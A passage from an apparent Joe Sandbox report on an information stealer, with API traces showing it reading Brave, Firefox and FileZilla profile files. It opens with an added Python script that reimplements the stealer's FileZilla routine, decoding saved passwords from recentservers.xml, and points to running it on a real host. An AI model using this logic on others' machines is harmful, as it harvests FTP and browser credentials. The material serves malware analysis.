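The function block above resolves a folder with SHGetFolderPathA (nFolder 0x28, which is CSIDL_PROFILE), appends \AppData\Roaming\FileZilla\recentservers.xml, and carries the strings <Host>, <Port>, <User>, <Pass encoding="base64"> together with the output labels browser: FileZilla, profile: null, url:, login: and password:. That is FileZilla's recent-connections file, in which the password is only base64-encoded, not encrypted, which is why stealers read it. The Python script below is an added example and is not code from the sample or from Joe Sandbox: it parses a constructed recentservers.xml, decodes the <Pass> field the way the stealer has to, and renders each record with the same labels. The sample XML, the function names, and the host:port rendering of the url line are assumptions; the report only shows the label strings.

```python
"""Read FileZilla's recentservers.xml the way a credential stealer does.

Added example, not code from the sandboxed sample or from Joe Sandbox.
The element names, the file path and the output labels come from the
string IDs in the function block; everything else here is an assumption.
"""
import base64
import xml.etree.ElementTree as ET

# Constructed sample of %USERPROFILE%\AppData\Roaming\FileZilla\recentservers.xml.
# The first server has a saved password, the second uses "Ask for password"
# (Logontype 0) and therefore has no <Pass> element at all.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>backup</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def decode_pass(pass_el):
    """Return the cleartext password for a <Pass> element, or None if absent.

    FileZilla 3.x writes <Pass encoding="base64">; older builds wrote the
    password raw. Base64 is an encoding, not a cipher, so this is a
    one-line recovery, not an attack.
    """
    if pass_el is None or not pass_el.text:
        return None
    if pass_el.get("encoding") == "base64":
        return base64.b64decode(pass_el.text).decode("utf-8", "replace")
    return pass_el.text


def parse_recentservers(xml_text):
    """Extract host, port, user and decoded password for every <Server>."""
    root = ET.fromstring(xml_text)
    entries = []
    for server in root.iter("Server"):
        entries.append({
            "host": server.findtext("Host", ""),
            "port": server.findtext("Port", ""),
            "user": server.findtext("User", ""),
            "password": decode_pass(server.find("Pass")),
        })
    return entries


def format_like_stealer(entries):
    """Render records with the label strings seen in the function block.

    The stealer's exact layout after each label is not visible in the
    report; host:port on the url line is an assumption.
    """
    lines = []
    for e in entries:
        lines.append("browser: FileZilla")
        lines.append("profile: null")
        lines.append("url: %s:%s" % (e["host"], e["port"]))
        lines.append("login: %s" % e["user"])
        lines.append("password: %s" % (e["password"] or ""))
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    records = parse_recentservers(SAMPLE_RECENTSERVERS)
    print(format_like_stealer(records))
```

To see what this sample would have collected on a real host, replace SAMPLE_RECENTSERVERS with the contents of the file under the CSIDL_PROFILE path plus the suffix shown in the block; the same applies to sitemanager.xml in the same directory, which uses the same <Server> layout and is not referenced in this block.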
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DBEF
                                  • lstrlen.KERNEL32(00334CA8), ref: 0030DBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DC17
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 0030DC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DC4C
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DC8F
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0030DCD0
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0030DCF0
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0030DD0A
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0030DD1D
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DD7B
                                  • lstrlen.KERNEL32(00331794), ref: 0030DD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DDA3
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DDAF
                                  • lstrlen.KERNEL32(?), ref: 0030DDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 0030DDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DE19
                                  • lstrlen.KERNEL32(00331794), ref: 0030DE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030DE6F
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DE7B
                                  • lstrlen.KERNEL32(01028B40), ref: 0030DE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DEBB
                                  • lstrlen.KERNEL32(00331794), ref: 0030DEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030DEE6
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DEF2
                                  • lstrlen.KERNEL32(01028800), ref: 0030DF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DFA5
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DFB1
                                  • lstrlen.KERNEL32(01028B40), ref: 0030DFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DFF4
                                  • lstrlen.KERNEL32(00331794), ref: 0030DFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E022
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030E02E
                                  • lstrlen.KERNEL32(01028800), ref: 0030E03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030E06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 0030E0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 0030E0E7
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030E11F
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0030E12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E155
                                  • lstrcat.KERNEL32(00000000,?), ref: 0030E15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E19F
                                  • lstrcat.KERNEL32(00000000), ref: 0030E1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0030E1F9
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030E22F
                                  • lstrlen.KERNEL32(01028990), ref: 0030E23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E261
                                  • lstrcat.KERNEL32(00000000,01028990), ref: 0030E269
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0030E988
                                  • FindClose.KERNEL32(00000000), ref: 0030E997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                  • String ID: Brave$Preferences$\Brave\Preferences
                                  • API String ID: 1346089424-1230934161
                                  • Opcode ID: ab970d471f19b7197ef371e06fbc34b7e642a1d25432bf45e578b4084d79b85c
                                  • Instruction ID: dfd501bcf558e308fa9afe942ff2a566592a03aeda85558c1c44da72f9073f11
                                  • Opcode Fuzzy Hash: ab970d471f19b7197ef371e06fbc34b7e642a1d25432bf45e578b4084d79b85c
                                  • Instruction Fuzzy Hash: C9525271A122069BCB22EFB8DC9DAAF77B9AF54300F054528F805AB291DF74DC45CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003060FF
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00306152
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00306185
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003061B5
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003061F0
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00306223
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00306233
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: 8daa8689aecece93e7af4bca19c02086dfe73bf2706888bc65fc52c1fc5e3253
                                  • Instruction ID: deb54da74527d819424e9ed4ff6280c492f0dbc0faa826e733a35b8c01f3bfcb
                                  • Opcode Fuzzy Hash: 8daa8689aecece93e7af4bca19c02086dfe73bf2706888bc65fc52c1fc5e3253
                                  • Instruction Fuzzy Hash: 74527D71A122169BCB22EFB8DC99AAF77B9AF14300F154424F805EB295DF74EC15CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316B9D
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316BCD
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316BFD
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316C2F
                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00316C3C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00316C43
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00316C5A
                                  • lstrlen.KERNEL32(00000000), ref: 00316C65
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316CA8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316CCF
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00316CE2
                                  • lstrlen.KERNEL32(00000000), ref: 00316CED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316D30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316D57
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00316D6A
                                  • lstrlen.KERNEL32(00000000), ref: 00316D75
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316DB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316DDF
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00316DF2
                                  • lstrlen.KERNEL32(00000000), ref: 00316E01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316E49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316E71
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00316E94
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00316EA8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00316EC9
                                  • LocalFree.KERNEL32(00000000), ref: 00316ED4
                                  • lstrlen.KERNEL32(?), ref: 00316F6E
                                  • lstrlen.KERNEL32(?), ref: 00316F81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 2641759534-2314656281
                                  • Opcode ID: 77d1bc4d4b24cab7625c3d2b7e04a89aea06b1bd9d491feb9e47edec3a940e58
                                  • Instruction ID: 4f88e0b8fd55b6f9cccc981e7fcb3b9e1cd19f114992c6f1075ed2a92b937353
                                  • Opcode Fuzzy Hash: 77d1bc4d4b24cab7625c3d2b7e04a89aea06b1bd9d491feb9e47edec3a940e58
                                  • Instruction Fuzzy Hash: 2102B170A11216ABCB17ABB4DD9EEAF7BB9AF18700F054414F801EB291DF74D945CBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00314B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00314B7F
                                  • lstrlen.KERNEL32(00334CA8), ref: 00314B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314BA7
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 00314BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00314BFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 2567437900-3783873740
                                  • Opcode ID: dd955357402ddd5bc97815462e50942001e1d0168bfd8095a59d7822bdae6ebe
                                  • Instruction ID: a94907b6e6a6c5ae3d75d79bb08e65dd4a3fe217b117fcf158a5ee714dad50c5
                                  • Opcode Fuzzy Hash: dd955357402ddd5bc97815462e50942001e1d0168bfd8095a59d7822bdae6ebe
                                  • Instruction Fuzzy Hash: 0C924470A11601CFDB1ACF29D958B9A77E5AF88714F1A806DE409DB3A1DB71DC82CF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00311291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003112B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003112BF
                                  • lstrlen.KERNEL32(00334CA8), ref: 003112CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003112E7
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 003112F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0031133A
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031135C
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 00311376
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003113AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003113D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003113E2
                                  • lstrlen.KERNEL32(00331794), ref: 003113ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031140A
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311416
                                  • lstrlen.KERNEL32(?), ref: 00311423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00311451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031147A
                                  • StrCmpCA.SHLWAPI(?,0102CAB0), ref: 003114A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003114E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311535
                                  • StrCmpCA.SHLWAPI(?,0102D328), ref: 00311552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003115BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003115E4
                                  • StrCmpCA.SHLWAPI(?,0102CBE8), ref: 00311602
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311633
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031165C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311685
                                  • StrCmpCA.SHLWAPI(?,0102C9F0), ref: 003116B3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003116F4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031171D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311745
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003117BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003117F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0031181C
                                  • FindClose.KERNEL32(00000000), ref: 0031182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 1c2b56f2c9dff085b7f83232e016db95805836c42b2e8fa3a1d28c85a7aa0728
                                  • Instruction ID: fb78036055f29f5d4559c601a6671e78a2ae1cdfaec4106f33bb88d176e09d54
                                  • Opcode Fuzzy Hash: 1c2b56f2c9dff085b7f83232e016db95805836c42b2e8fa3a1d28c85a7aa0728
                                  • Instruction Fuzzy Hash: CF126271A112069BCB2AEF78D899AEF77B8AF58300F054528F946D7290DF34DC55CB90
                                  APIs
                                  • wsprintfA.USER32 ref: 0031CBFC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0031CC13
                                  • lstrcat.KERNEL32(?,?), ref: 0031CC5F
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031CC71
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0031CC8B
                                  • wsprintfA.USER32 ref: 0031CCB0
                                  • PathMatchSpecA.SHLWAPI(?,010287F0), ref: 0031CCE2
                                  • CoInitialize.OLE32(00000000), ref: 0031CCEE
                                    • Part of subcall function 0031CAE0: CoCreateInstance.COMBASE(0032B110,00000000,00000001,0032B100,?), ref: 0031CB06
                                    • Part of subcall function 0031CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0031CB46
                                    • Part of subcall function 0031CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0031CBC9
                                  • CoUninitialize.COMBASE ref: 0031CD09
                                  • lstrcat.KERNEL32(?,?), ref: 0031CD2E
                                  • lstrlen.KERNEL32(?), ref: 0031CD3B
                                  • StrCmpCA.SHLWAPI(?,0032CFEC), ref: 0031CD55
                                  • wsprintfA.USER32 ref: 0031CD7D
                                  • wsprintfA.USER32 ref: 0031CD9C
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 0031CDB0
                                  • wsprintfA.USER32 ref: 0031CDD8
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0031CDF1
                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0031CE10
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 0031CE28
                                  • CloseHandle.KERNEL32(00000000), ref: 0031CE33
                                  • CloseHandle.KERNEL32(00000000), ref: 0031CE3F
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0031CE54
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031CE94
                                  • FindNextFileA.KERNEL32(?,?), ref: 0031CF8D
                                  • FindClose.KERNEL32(?), ref: 0031CF9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
